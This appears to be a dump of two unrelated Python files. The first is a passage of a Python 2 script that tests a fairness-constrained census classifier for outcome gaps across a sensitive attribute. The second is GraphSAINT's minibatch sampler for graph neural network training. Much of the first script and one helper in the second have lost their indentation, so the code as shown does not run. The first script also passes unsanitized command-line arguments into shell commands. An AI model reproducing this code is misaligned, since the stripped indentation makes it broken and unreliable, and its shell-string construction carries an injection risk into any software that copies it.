        L = map(int,line1[:-1])
        sens.append(L[sens_arg-1])
        #L[sens_arg-1]=-1
        X.append(L)
        # Binary label: 0 -> -1, anything else -> +1.
        if(int(line1[-1])==0):
            Y.append(-1)
        else:
            Y.append(1)

X = np.array(X, dtype=float);
Y = np.array(Y, dtype = float);
sensitive[name] = np.array(sens, dtype = float);

# Train the (fairness-constrained) logistic regression model; w is the
# learned weight vector used for predictions below.
loss_function = lf._logistic_loss;
sep_constraint = 0;
sensitive_attrs = [name];
sensitive_attrs_to_cov_thresh = {name:cov};
gamma=None
w = ut.train_model(X, Y, sensitive, loss_function, 1, 0, sep_constraint, sensitive_attrs, sensitive_attrs_to_cov_thresh, gamma);

# Number of possible values for each of the 13 input attributes.
num_atr=[10,8,70,16,7,14,6,5,2,100,40,100,40]
# NOTE(review): 'map' shadows the builtin map(); it caches input -> label.
map={}
f = open(outputfile,"w")
# Previously generated suite, replayed by check_ratio() for options 3 and 4.
already = "../Suites/A"+str(sens_arg)+str(fixval)
def check_ratio(fixed):
fix_atr = []
if option==3 or option==4:
fpr = open(already,"r")
done = {}
for line in fpr:
line = line.strip()
line = line.split(',')
line = ','.join(line[:-1])
line+=','
done[line]=1
if fixval==9:
pos=[0,0]
neg=[0,0]
else:
pos=[0,0,0,0,0]
neg=[0,0,0,0,0]
for inp in done.keys():
strinp = inp
inp = inp.split(',')
inp=inp[:-1]
i=0
inpstr=''
while i<len(inp):
inpstr+=inp[i]+' '
inp[i] = int(inp[i])
i+=1
if option==3:
out = np.sign(np.dot(w, inp))
else:
out = commands.getoutput("python Atestcensus.py "+sys.argv[1]+" "+sys.argv[2]+" "+inpstr)
if(out>0):
pos[inp[fixval-1]]+=1
else:
neg[inp[fixval-1]]+=1
if printsuite==1:
f.write(strinp+" "+str(out)+"\n")
i=0
maxv = 0
minv = 1
while i<len(pos):
#print pos[i],neg[i]
v = pos[i]*1.0/(pos[i]+neg[i])
if v > maxv :
maxv = v
if v < minv:
minv = v
i+=1
print "score is ",100*(maxv-minv)
return
num=1
for i in range(0,len(fixed)):
if(fixed[i]==1):
num = num*num_atr[i]
fix_atr.append(i)
val = 0
max = -1
min = 100
#print num
while val< num:
inp_fix=['','','','','','','','','','','','','']
i=len(fix_atr)-1
tmp_val = val
while i>=0:
inp_fix[fix_atr[i]] = tmp_val%num_atr[fix_atr[i]]
tmp_val = (tmp_val - tmp_val%num_atr[fix_atr[i]])/num_atr[fix_atr[i]]
i-=1
#print inp_fix
val+=1
inp=['','','','','','','','','','','','','']
num_inp = 0
pos = 0
neg = 0
for i3 in range(0, max_inp) :
#print inp_fix
if(num_inp>=max_inp):
break;
j=0
while j<len(num_atr):
if inp_fix[j]=='':
inp[j] = (random.randint(0,num_atr[j]-1))
else:
inp[j]=inp_fix[j]
j+=1
num_inp+=1
str1=""
strinp=""
for x in inp:
str1 += str(x)+","
strinp+=str(x)+" "
if option ==1 :
out = commands.getoutput("python Atestcensus.py "+sys.argv[1]+" "+sys.argv[2]+" "+strinp)
else:
out = np.sign(np.dot(w, inp))
if printsuite==1:
f.write(str1+" "+str(out)+"\n")
#print str1,out
if(out>0):
#print inp, out, 1
map[','.join(str(inp))] = 1
pos+=1
else:
#print inp,out, 0
map[','.join(str(inp))] = 0
neg+=1
frac=pos*1.0/(pos+neg)
if 2.5*math.sqrt(frac*(1-frac)*1.0/(pos+neg)<0.05) and pos+neg>minInp:
break
if(pos*1.0/(pos+neg)>max):
max = pos*1.0/(pos+neg)
if(pos*1.0/(pos+neg)<min):
min = pos*1.0/(pos+neg)
#print (max-min)*100
def findsubsets(S, m):
    """Return every m-element subset of S, as a set of tuples."""
    all_combos = itertools.combinations(S, m)
    return set(all_combos)
if(sens_arg==9 and fixval==8):
fixed = [0,0,0,0,0,0,0,1,0,0,0,0,0]
elif (sens_arg==9 and fixval==9):
fixed = [0,0,0,0,0,0,0,0,1,0,0,0,0]
elif (sens_arg==8 and fixval==9):
fixed = [0,0,0,0,0,0,0,0,1,0,0,0,0]
else:
fixed = [0,0,0,0,0,0,0,1,0,0,0,0,0]
check_ratio(fixed)
print "output written in ", outputfile
f.close()
|
<gh_stars>0
from graphsaint.globals import *
import math
from graphsaint.utils import *
from graphsaint.graph_samplers import *
from graphsaint.norm_aggr import *
import torch
import scipy.sparse as sp
import scipy
import numpy as np
import time
def _coo_scipy2torch(adj):
"""
convert a scipy sparse COO matrix to torch
"""
values = adj.data
indices = np.vstack((adj.row, adj.col))
i = torch.LongTensor(indices)
v = torch.FloatTensor(values)
return torch.sparse.FloatTensor(i,v, torch.Size(adj.shape))
class Minibatch:
    """
    Provides minibatches for the trainer or evaluator. This class is responsible for
    calling the proper graph sampler and estimating normalization coefficients
    (loss norm "lambda" and aggregation norm "alpha").
    """
    def __init__(self, adj_full_norm, adj_train, role, train_params, cpu_eval=False):
        """
        Inputs:
            adj_full_norm       scipy CSR, adj matrix for the full graph (row-normalized)
            adj_train           scipy CSR, adj matrix for the training graph. Since we are
                                under transductive setting, for any edge in this adj,
                                both end points must be training nodes.
            role                dict, key 'tr' -> list of training node IDs;
                                      key 'va' -> list of validation node IDs;
                                      key 'te' -> list of test node IDs.
            train_params        dict, additional parameters related to training. e.g.,
                                how many subgraphs we want to get to estimate the norm
                                coefficients.
            cpu_eval            bool, whether or not we want to run full-batch evaluation
                                on the CPU.
        Outputs:
            None
        """
        # GPU is used only when one was requested on the command line;
        # cpu_eval forces evaluation onto the CPU regardless.
        self.use_cuda = (Globals.args_global.gpu >= 0)
        if cpu_eval:
            self.use_cuda=False
        self.node_train = np.array(role['tr'])
        self.node_val = np.array(role['va'])
        self.node_test = np.array(role['te'])
        # Full-graph adjacency kept as a torch sparse tensor for full-batch eval.
        self.adj_full_norm = _coo_scipy2torch(adj_full_norm.tocoo())
        self.adj_train = adj_train
        # -----------------------
        # sanity check (optional)
        # -----------------------
        #for role_set in [self.node_val, self.node_test]:
        #    for v in role_set:
        #        assert self.adj_train.indptr[v+1] == self.adj_train.indptr[v]
        #_adj_train_T = sp.csr_matrix.tocsc(self.adj_train)
        #assert np.abs(_adj_train_T.indices - self.adj_train.indices).sum() == 0
        #assert np.abs(_adj_train_T.indptr - self.adj_train.indptr).sum() == 0
        #_adj_full_T = sp.csr_matrix.tocsc(adj_full_norm)
        #assert np.abs(_adj_full_T.indices - adj_full_norm.indices).sum() == 0
        #assert np.abs(_adj_full_T.indptr - adj_full_norm.indptr).sum() == 0
        #printf("SANITY CHECK PASSED", style="yellow")
        if self.use_cuda:
            # now i put everything on GPU. Ideally, full graph adj/feat
            # should be optionally placed on CPU
            self.adj_full_norm = self.adj_full_norm.cuda()
        # below: book-keeping for mini-batch
        self.node_subgraph = None
        self.batch_num = -1
        self.method_sample = None
        # Pools of pre-sampled subgraphs (parallel lists of CSR pieces),
        # filled by par_graph_sample() and consumed (pop) by one_batch().
        self.subgraphs_remaining_indptr = []
        self.subgraphs_remaining_indices = []
        self.subgraphs_remaining_data = []
        self.subgraphs_remaining_nodes = []
        self.subgraphs_remaining_edge_index = []
        # Per-node loss normalization for training; estimated in set_sampler().
        self.norm_loss_train = np.zeros(self.adj_train.shape[0])
        # norm_loss_test is used in full batch evaluation (without sampling).
        # so neighbor features are simply averaged.
        self.norm_loss_test = np.zeros(self.adj_full_norm.shape[0])
        _denom = len(self.node_train) + len(self.node_val) + len(self.node_test)
        if len(self.node_train):
            self.norm_loss_test[self.node_train] = 1. / _denom
        # NOTE(review): unlike the train/test assignments, this one is unguarded;
        # harmless either way since numpy indexing with an empty array is a no-op.
        self.norm_loss_test[self.node_val] = 1. / _denom
        if len(self.node_test):
            self.norm_loss_test[self.node_test] = 1. / _denom
        self.norm_loss_test = torch.from_numpy(self.norm_loss_test.astype(np.float32))
        if self.use_cuda:
            self.norm_loss_test = self.norm_loss_test.cuda()
        # Per-edge aggregation normalization; one entry per nonzero of adj_train.
        self.norm_aggr_train = np.zeros(self.adj_train.size)
        self.sample_coverage = train_params['sample_coverage']
        # Node degrees in the training graph, used for degree-based adj renormalization.
        self.deg_train = np.array(self.adj_train.sum(1)).flatten()
    def set_sampler(self, train_phases):
        """
        Pick the proper graph sampler. Run the warm-up phase to estimate
        loss / aggregation normalization coefficients.
        Inputs:
            train_phases       dict, config / params for the graph sampler
        Outputs:
            None
        """
        # Drop any subgraphs sampled under a previous sampler configuration.
        self.subgraphs_remaining_indptr = []
        self.subgraphs_remaining_indices = []
        self.subgraphs_remaining_data = []
        self.subgraphs_remaining_nodes = []
        self.subgraphs_remaining_edge_index = []
        self.method_sample = train_phases['sampler']
        if self.method_sample == 'mrw':
            # multi-dimensional random walk sampler
            if 'deg_clip' in train_phases:
                _deg_clip = int(train_phases['deg_clip'])
            else:
                _deg_clip = 100000  # setting this to a large number so essentially there is no clipping in probability
            self.size_subg_budget = train_phases['size_subgraph']
            self.graph_sampler = mrw_sampling(
                self.adj_train,
                self.node_train,
                self.size_subg_budget,
                train_phases['size_frontier'],
                _deg_clip,
            )
        elif self.method_sample == 'rw':
            # random walk sampler: budget = roots x walk depth
            self.size_subg_budget = train_phases['num_root'] * train_phases['depth']
            self.graph_sampler = rw_sampling(
                self.adj_train,
                self.node_train,
                self.size_subg_budget,
                int(train_phases['num_root']),
                int(train_phases['depth']),
            )
        elif self.method_sample == 'edge':
            # edge sampler: each sampled edge contributes (up to) 2 nodes
            self.size_subg_budget = train_phases['size_subg_edge'] * 2
            self.graph_sampler = edge_sampling(
                self.adj_train,
                self.node_train,
                train_phases['size_subg_edge'],
            )
        elif self.method_sample == 'node':
            # independent node sampler
            self.size_subg_budget = train_phases['size_subgraph']
            self.graph_sampler = node_sampling(
                self.adj_train,
                self.node_train,
                self.size_subg_budget,
            )
        elif self.method_sample == 'full_batch':
            # degenerate sampler: the "subgraph" is the whole training graph
            self.size_subg_budget = self.node_train.size
            self.graph_sampler = full_batch_sampling(
                self.adj_train,
                self.node_train,
                self.size_subg_budget,
            )
        elif self.method_sample == "vanilla_node_python":
            # pure-python reference node sampler
            self.size_subg_budget = train_phases["size_subgraph"]
            self.graph_sampler = NodeSamplingVanillaPython(
                self.adj_train,
                self.node_train,
                self.size_subg_budget,
            )
        else:
            raise NotImplementedError
        # Reset counters before the warm-up estimation below.
        self.norm_loss_train = np.zeros(self.adj_train.shape[0])
        self.norm_aggr_train = np.zeros(self.adj_train.size).astype(np.float32)
        # -------------------------------------------------------------
        # BELOW: estimation of loss / aggregation normalization factors
        # -------------------------------------------------------------
        # For some special sampler, no need to estimate norm factors, we can calculate
        # the node / edge probabilities directly.
        # However, for integrity of the framework, we follow the same procedure
        # for all samplers:
        #     1. sample enough number of subgraphs
        #     2. update the counter for each node / edge in the training graph
        #     3. estimate norm factor alpha and lambda
        tot_sampled_nodes = 0
        # Keep sampling until total sampled nodes exceed coverage x |train nodes|.
        while True:
            self.par_graph_sample('train')
            tot_sampled_nodes = sum([len(n) for n in self.subgraphs_remaining_nodes])
            if tot_sampled_nodes > self.sample_coverage * self.node_train.size:
                break
        num_subg = len(self.subgraphs_remaining_nodes)
        # Count how often each training edge / node appeared across subgraphs.
        for i in range(num_subg):
            self.norm_aggr_train[self.subgraphs_remaining_edge_index[i]] += 1
            self.norm_loss_train[self.subgraphs_remaining_nodes[i]] += 1
        # Sampling must never touch val / test nodes (transductive setting).
        if len(self.node_test):
            assert self.norm_loss_train[self.node_val].sum() + self.norm_loss_train[self.node_test].sum() == 0
        else:
            assert self.norm_loss_train[self.node_val].sum() == 0
        # alpha per edge: count(node v) / count(edge (v,u)), clipped to [0, 1e4];
        # NaN (0/0, edge never sampled) falls back to 0.1.
        for v in range(self.adj_train.shape[0]):
            i_s = self.adj_train.indptr[v]
            i_e = self.adj_train.indptr[v + 1]
            val = np.clip(self.norm_loss_train[v] / self.norm_aggr_train[i_s : i_e], 0, 1e4)
            val[np.isnan(val)] = 0.1
            self.norm_aggr_train[i_s : i_e] = val
        # lambda per node: num_subg / count(v) / |train nodes|, with never-sampled
        # nodes given a pseudo-count of 0.1 to avoid division by zero.
        self.norm_loss_train[np.where(self.norm_loss_train==0)[0]] = 0.1
        self.norm_loss_train[self.node_val] = 0
        if len(self.node_test):
            self.norm_loss_train[self.node_test] = 0
        self.norm_loss_train[self.node_train] = num_subg / self.norm_loss_train[self.node_train] / self.node_train.size
        self.norm_loss_train = torch.from_numpy(self.norm_loss_train.astype(np.float32))
        if self.use_cuda:
            self.norm_loss_train = self.norm_loss_train.cuda()
    def par_graph_sample(self,phase):
        """
        Perform graph sampling in parallel. A wrapper function for graph_samplers.py.
        Extends the subgraphs_remaining_* pools with the newly sampled subgraphs.
        """
        t0 = time.time()
        _indptr, _indices, _data, _v, _edge_index = self.graph_sampler.par_sample(phase)
        t1 = time.time()
        print('sampling 200 subgraphs:   time = {:.3f} sec'.format(t1 - t0), end="\r")
        self.subgraphs_remaining_indptr.extend(_indptr)
        self.subgraphs_remaining_indices.extend(_indices)
        self.subgraphs_remaining_data.extend(_data)
        self.subgraphs_remaining_nodes.extend(_v)
        self.subgraphs_remaining_edge_index.extend(_edge_index)
    def one_batch(self, mode='train'):
        """
        Generate one minibatch for trainer. In the 'train' mode, one minibatch corresponds
        to one subgraph of the training graph. In the 'val' or 'test' mode, one batch
        corresponds to the full graph (i.e., full-batch rather than minibatch evaluation
        for validation / test sets).
        Inputs:
            mode                str, can be 'train', 'val', 'test' or 'valtest'
        Outputs:
            node_subgraph       np array, IDs of the subgraph / full graph nodes
            adj                 scipy CSR, adj matrix of the subgraph / full graph
            norm_loss           np array, loss normalization coefficients. In 'val' or
                                'test' modes, we don't need to normalize, and so the values
                                in this array are all 1.
        """
        if mode in ['val','test','valtest']:
            # Full-batch evaluation: "subgraph" is the entire graph.
            self.node_subgraph = np.arange(self.adj_full_norm.shape[0])
            adj = self.adj_full_norm
        else:
            assert mode == 'train'
            # Refill the subgraph pool on demand.
            if len(self.subgraphs_remaining_nodes) == 0:
                self.par_graph_sample('train')
                print()
            self.node_subgraph = self.subgraphs_remaining_nodes.pop()
            self.size_subgraph = len(self.node_subgraph)
            # Rebuild the subgraph adjacency from the pooled CSR pieces.
            adj = sp.csr_matrix(
                (
                    self.subgraphs_remaining_data.pop(),
                    self.subgraphs_remaining_indices.pop(),
                    self.subgraphs_remaining_indptr.pop()),
                shape=(self.size_subgraph,self.size_subgraph,
                )
            )
            adj_edge_index = self.subgraphs_remaining_edge_index.pop()
            #print("{} nodes, {} edges, {} degree".format(self.node_subgraph.size,adj.size,adj.size/self.node_subgraph.size))
            # Apply per-edge aggregation normalization (alpha), then degree norm.
            norm_aggr(adj.data, adj_edge_index, self.norm_aggr_train, num_proc=Globals.args_global.num_cpu_core)
            # adj.data[:] = self.norm_aggr_train[adj_edge_index][:]   # this line is interchangable with the above line
            adj = adj_norm(adj, deg=self.deg_train[self.node_subgraph])
            adj = _coo_scipy2torch(adj.tocoo())
            if self.use_cuda:
                adj = adj.cuda()
            self.batch_num += 1
        norm_loss = self.norm_loss_test if mode in ['val','test', 'valtest'] else self.norm_loss_train
        norm_loss = norm_loss[self.node_subgraph]
        return self.node_subgraph, adj, norm_loss
    def num_training_batches(self):
        # Number of minibatches per epoch, rounding the last partial batch up.
        return math.ceil(self.node_train.shape[0] / float(self.size_subg_budget))
    def shuffle(self):
        # Re-permute training nodes and restart the batch counter for a new epoch.
        self.node_train = np.random.permutation(self.node_train)
        self.batch_num = -1
    def end(self):
        # True once the batches consumed this epoch cover all training nodes.
        return (self.batch_num + 1) * self.size_subg_budget >= self.node_train.shape[0]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.